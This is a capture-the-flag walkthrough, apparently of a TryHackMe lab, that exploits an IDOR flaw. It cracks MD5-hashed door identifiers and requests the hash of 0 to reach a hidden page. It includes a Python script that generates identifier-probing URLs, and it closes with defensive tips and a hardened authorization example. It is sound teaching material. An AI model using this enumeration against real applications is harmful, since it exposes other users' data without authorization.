4.7.web idor corridor thm(Web Security Academy)


What is the flag?
Flag{################################}

Insecure Direct Object Reference (IDOR) is an access-control vulnerability: the application lets a user reach a protected resource by changing the value of a parameter that references that resource, without checking that the user is actually authorized for it. For example, an IDOR could let an attacker view another user's profile simply by changing the user_id parameter in a URL.
- First, we connected to the machine and obtained the server's IP.
- Then I put the IP in the browser, and this was the result:

So where is the key?

When hovering over the doors with my mouse, I noticed that each door links to a different path, each a different string of characters, so I looked at the page source.

  • In the source code I found the door paths in this form, so I decided to check them. I copied them all into a note and went to find out what kind of hash they were, at https://www.tunnelsup.com/hash-analyzer/

The analyzer reported the hash type as MD4 or MD5 (both give 32 hex characters, so the length alone cannot tell them apart), so I went to https://crackstation.net/

  • This was the result:

- From here I was sure it was MD5, and the important detail is that the cracked plaintext is the number 1.
- So I had to see the results for the rest of the hashes:

  • The results are the sequential numbers 1 to 13, matching the number of doors. Since this room is about the IDOR vulnerability, I decided to append the numbers, one at a time, to the URL after the IP:

- That returned something else, not a door. But remember this is an IDOR vulnerability, so I also tried numbers below 1 and above 13. That did not work either.
- The door paths were MD5 hashes of 1 to 13, not the plain numbers, so I generated the MD5 hash of 14 at https://gchq.github.io/CyberChef

- Then I appended that hash to the URL, but it did not work.

- Next I took the MD5 hash of the number 0 ( cfcd208495d565ef66e7dff9f98764da ).
- Then I tried the hash of 0 in the URL.
- It worked.
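The manual steps above (identify the door paths as MD5 of 1..13, then probe the references the UI never links to, such as 0 and 14) can be done in one go. The script below is an added example, not part of the original writeup or the room: the door paths are regenerated locally as a constructed sample rather than copied from the target, and the `probe` width is an assumed choice.

```python
import hashlib

# Constructed sample: the 13 door paths are MD5 digests of the decimal
# strings "1".."13" (regenerated here, not scraped from the room).
DOOR_PATHS = [hashlib.md5(str(n).encode()).hexdigest() for n in range(1, 14)]


def md5_hex(value: int) -> str:
    """MD5 hex digest of the decimal string form of an integer, e.g. "0"."""
    return hashlib.md5(str(value).encode()).hexdigest()


def identify_sequence(paths, search_range=range(0, 100000)):
    """Map each observed path to the integer whose MD5 produced it (or None).

    A reverse lookup table is built once so the check is one hash per
    candidate, instead of hashing every candidate against every path.
    """
    table = {md5_hex(n): n for n in search_range}
    return {p: table.get(p) for p in paths}


def hidden_candidates(paths, search_range=range(0, 100000), probe=5):
    """Return (number, hash) pairs just outside the observed range.

    These are references the UI never links to but the server may still
    serve; requesting them is the IDOR check. probe=5 is an assumed width.
    """
    found = [n for n in identify_sequence(paths, search_range).values()
             if n is not None]
    if not found:
        return []
    lo, hi = min(found), max(found)
    below = [(n, md5_hex(n)) for n in range(max(0, lo - probe), lo)]
    above = [(n, md5_hex(n)) for n in range(hi + 1, hi + 1 + probe)]
    return below + above


if __name__ == "__main__":
    # Hypothetical target; substitute the room's IP.
    base = "http://TARGET_IP"
    for n, h in hidden_candidates(DOOR_PATHS):
        print(f"{n:>3}  {base}/{h}")
```

Each printed URL is a candidate to request; in this room the first one, the hash of 0, is the one that returns the flag.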

Flag: flag{2477##########################2e}

Here are some additional tips for preventing IDOR vulnerabilities:
• Enforce authorization on every object access, on the server side: check that the authenticated user is allowed to reach that specific record, not just that they are logged in.
• Do not rely on hiding or hashing identifiers. An MD5 of a sequential number is still guessable, as this room shows.
• Prefer indirect or unpredictable references (for example per-user mappings or random UUIDs) over sequential IDs, but only as defence in depth, never as a replacement for the authorization check.
• Regularly test your applications for IDOR, including identifiers outside the range the UI exposes.
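To make the first tip concrete, here is an added example (not code from the original post) of an object lookup in the vulnerable shape beside its hardened form. The in-memory document store, the user names and the `Forbidden` exception are all constructed for the illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Document:
    doc_id: int
    owner: str
    body: str


# Constructed sample store: two users, three documents.
DOCS = {
    1: Document(1, "alice", "alice's notes"),
    2: Document(2, "bob", "bob's notes"),
    3: Document(3, "alice", "alice's draft"),
}


class Forbidden(Exception):
    """Caller is authenticated but not authorized for the requested object."""


def get_document_vulnerable(current_user: str, doc_id: int) -> Document:
    """IDOR: the identifier alone selects the record and the caller's
    identity is ignored, so any logged-in user reads any document by
    changing doc_id."""
    return DOCS[doc_id]


def get_document_hardened(current_user: str, doc_id: int) -> Document:
    """Object-level authorization on every request, server side.

    Unknown and forbidden ids produce the same error so the endpoint does
    not reveal which identifiers exist (an enumeration oracle)."""
    doc = DOCS.get(doc_id)
    if doc is None or doc.owner != current_user:
        raise Forbidden("document not found")
    return doc


def is_forbidden(current_user: str, doc_id: int) -> bool:
    """True if the hardened lookup refuses this (user, id) pair."""
    try:
        get_document_hardened(current_user, doc_id)
    except Forbidden:
        return True
    return False
```

The ownership comparison belongs in the data-access layer, so that every route reaching a document goes through it; checking only in one handler is how the next endpoint reintroduces the IDOR.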

see you soon

Abdelwahab_Shandy

AS_Cyber